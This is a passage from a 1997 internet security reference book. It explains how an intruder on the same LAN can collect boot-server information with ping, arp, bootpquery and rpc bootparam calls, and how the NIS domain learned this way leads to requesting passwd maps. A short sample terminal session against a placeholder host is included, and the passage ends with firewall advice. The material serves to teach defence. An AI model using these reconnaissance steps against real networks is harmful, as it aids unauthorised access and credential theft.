Internet Security Professional Reference, Second Edition
(Publisher: Macmillan Computer Publishing)
Author(s): Authors Multiple
ISBN: 156205760x
Publication Date: 07/16/97

Previous Table of Contents Next


Boot Information

If SATAN discovers that a system’s portmap program offers the bootparam service, SATAN will scan that service and learn the NIS domain name. SATAN focuses on the first phase of a network attack, gaining remote access, and does not try to interrogate the bootpd server; however, the bootpd server offers an intruder an excellent way to carry out phase three of an attack. If the intruder has gained root access to a system, the intruder can exploit vulnerabilities offered by bootpd. SATAN will list the systems running bootpd, and the vigilant intruder will try to attack these systems once he or she has gained access to any system on the same LAN segment.

After the hacker has gained access to a system on the same LAN segment as the bootpd server, the hacker can identify the LAN addresses of the remote server by first pinging it. The ping causes the compromised system to generate an ARP request packet that the remote server responds to with a packet containing its LAN address. The hacker then dumps the arp cache of the compromised system. This requires the hacker to be on the same LAN segment, or else the LAN address is just that of the nearest router. Once again, SATAN is useful in the first phase of an attack, when trying to gain initial access to a remote system. This discussion of bootpd is related to the third phase of an attack: extended access by using additional vulnerabilities, in this case vulnerabilities only available to systems on the same LAN.

Of course, if the hacker is on the same LAN segment, the hacker can spoof the arp requests and impersonate hosts, a major vulnerability. Therefore, a more realistic attack might come from a brute force sequencing through all the possible LAN addresses. The first three parts of the LAN address are fixed by the manufacturer and are widely available. The last three parts vary by system, offering a total of 255×255×255 = 16 million combinations. A real attack could generate 16 million bootpc request packets; perhaps they would start the attack on a Friday evening and run it until they got lucky. Some intelligent sequencing may even be possible. A hacker could try to map a pattern of the LAN address scheme on a vendor’s system versus the system and shipment date and then use previously gained information to narrow the search space.

Assuming that the hacker is able to get the LAN address, the hacker can now get information on the boot file that the bootpd (dhcp) server offers to boot clients. (Note that some Unix systems, notably Sun, use the rpc bootparam method for providing this information, rather than a bootpd server.) Here is an example of being on the same LAN and using ping to grab the LAN address:

% ping sys4.notreal.com
PING sys4.notreal.com: 64 byte packets
64 bytes from 12.3.45.67: icmp_seq=0. time=2. ms
% arp -a
sys4.notreal.com (12.3.45.67) at 8:0:9:01:23:45 ether
% bootpquery 080009012345
Received BOOTREPLY from m4.notreal.com (12.3.45.78)

Hardware Address:       08:00:09:01:23:45
Hardware Type:          ethernet
IP Address:             12.3.45.67
Boot file:              /usr/lib/uxbootlf.700

RFC 1048 Vendor Information:
  Subnet Mask:          255.255.248.0
  Gateway:              12.3.45.6
  Domain Name Server:   12.3.4.56
  Host Name:            sys4
%

The bootpquery program is a simple HP-UX program that generates a bootp request and formats the reply. A comparable program is easy enough to generate on other Unix systems.

The information returned by bootpd is quite useful. The bootp packets contain IP and hostname information about systems that boot their kernels over a network connection to a server. The bootp packets also indicate a boot server system that supplies boot files and boot configuration information to client systems that boot over the network. An intruder can try to corrupt boot data on the server or try to masquerade as a boot server to the client.

If the remote systems are using the rpc bootparam method instead of the bootpd method, the hacker can get the information via the portmap program on the systems that showed bootparam on the rpcinfo -p list.

By crafting an rpc program that does a callrpc() for BOOTPARAMPROC_WHOAMI, the hacker can get the same information, as well as the NIS domain of the systems, which can then be used to request NIS maps, such as passwd, from the ypserv program. A program called bootparam that gets such information is included as part of SATAN.

Tip:  A system administrator should never permit a boot server to be available for Internet access. The firewalls should be configured to screen out packets on the bootp (67/UDP, 68/UDP, 1067/UDP, 1068/UDP) and portmap ports (111/UDP, 111/TCP).

finger, rusers, and rwho

Some consider the finger program to be one of the most dangerous tools for information leakage. Although it provides useful information for monitoring remote hosts, it provides even more useful information for hackers who are trying to build up databases of information about the target systems. A comparable rpc program, rusers, is frequently available even when fingerd is not. A third program, rwho, also provides similar information.


Previous Table of Contents Next